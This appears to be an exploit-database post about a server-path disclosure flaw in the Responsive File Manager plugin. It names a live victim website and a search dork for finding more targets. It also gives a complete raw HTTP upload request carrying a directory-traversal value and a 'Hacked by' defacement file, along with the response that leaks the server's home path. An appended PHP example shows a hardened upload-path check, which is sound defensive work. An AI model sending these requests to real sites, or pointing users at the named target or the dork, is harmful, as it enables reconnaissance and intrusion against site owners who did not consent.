Responsive File Manager to Path Leaked - CXSecurity.com

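Vulnerability ID 1812988 Vulnerability type
Published 2019-11-06 Updated 2019-11-06
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019110028
|Vulnerability details
Vulnerability details have not been disclosed yet
|Exploit (EXP)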
Live Target: http://pfionline.co.in/assets/tinymce/filemanager/dialog.php
Author: L4663r666h05t

In this case, you need Burp Suite.

Note:
Burp Suite is usually used to intercept requests; here I am just trying to change the path to a wrong directory, and then the response will show the path of the victim's website that uses Responsive File Manager.

Dork: inurl:/filemanager/css/
Exploit: /filemanager/dialog.php

Step One: https://pasteboard.co/IFjDTTA.jpg
Step Two: https://pasteboard.co/IFjE8h2.jpg
Last Step: https://pasteboard.co/IFjEk2R.jpg


REQUEST:

POST /assets/tinymce/filemanager/upload.php HTTP/1.1
Host: user.com
Content-Length: 439
Accept: application/json
Cache-Control: no-cache
Origin: http://user.com/
X-Requested-With: XMLHttpRequest
User-Agent: -
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC
Referer: http://user.com/assets/tinymce/filemanager/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac
Connection: close

------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path"

../../../blablabla
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path_thumb"

../thumbs/
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="file"; filename="world.txt"
Content-Type: text/plain

Hacked by L4663r666h05t
------WebKitFormBoundaryWwXMWsA3nGDOf2uC--


RESPONSE:

HTTP/1.1 200 OK
Date: Tue, 05 Nov 2019 18:26:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 84
Content-Type: text/html; charset=UTF-8

wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53)

Path Leaked: /home/user/public_html/

Thanks to: Indonesian Code Party - Exploiter.ID
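
One way to close this leak, as an added example (not code from the advisory or from Responsive File Manager): a hypothetical handler that checks the `path` field against an assumed upload base and answers with a generic error, keeping file and line details in the server log only. `UPLOAD_BASE`, `leaky_error`, `resolve_upload_dir` and `handle_upload_path` are assumed names, and the inputs at the bottom are constructed.

```php
<?php
// Added example: hypothetical upload-path check, not Responsive File Manager's code.
// UPLOAD_BASE is an assumed, constructed location for this demo.
define('UPLOAD_BASE', sys_get_temp_dir() . '/rfm_demo_uploads');
if (!is_dir(UPLOAD_BASE)) {
    mkdir(UPLOAD_BASE, 0700, true);
}

// Leaky pattern: the client-visible message embeds the script path and line,
// which is the shape of the response body shown above.
function leaky_error(): string
{
    return 'wrong path (@' . __FILE__ . '#' . __LINE__ . ')';
}

// Hardened pattern: resolve the requested directory and require that it stays
// under the upload base. Returns null for anything missing or outside the base.
function resolve_upload_dir(string $requested): ?string
{
    $base = realpath(UPLOAD_BASE);
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false) {
        return null; // nonexistent target, e.g. a traversal to nowhere
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the upload base
    }
    return $real;
}

// Returns [HTTP status, JSON body]. Details go to the server log, keyed by a
// short reference the client can quote to support.
function handle_upload_path(string $requested): array
{
    if (resolve_upload_dir($requested) === null) {
        $ref = bin2hex(random_bytes(4));
        error_log(sprintf('[%s] rejected upload path %s (%s#%d)',
            $ref, json_encode($requested), __FILE__, __LINE__));
        return [400, json_encode(['error' => 'invalid path', 'ref' => $ref])];
    }
    return [200, json_encode(['ok' => true])];
}

echo 'leaky:    ', leaky_error(), PHP_EOL;
// Constructed inputs: the traversal value from the request above, then the base itself.
foreach (['../../../blablabla', ''] as $p) {
    [$status, $body] = handle_upload_path($p);
    echo 'hardened: ', $status, ' ', $body, PHP_EOL;
}
```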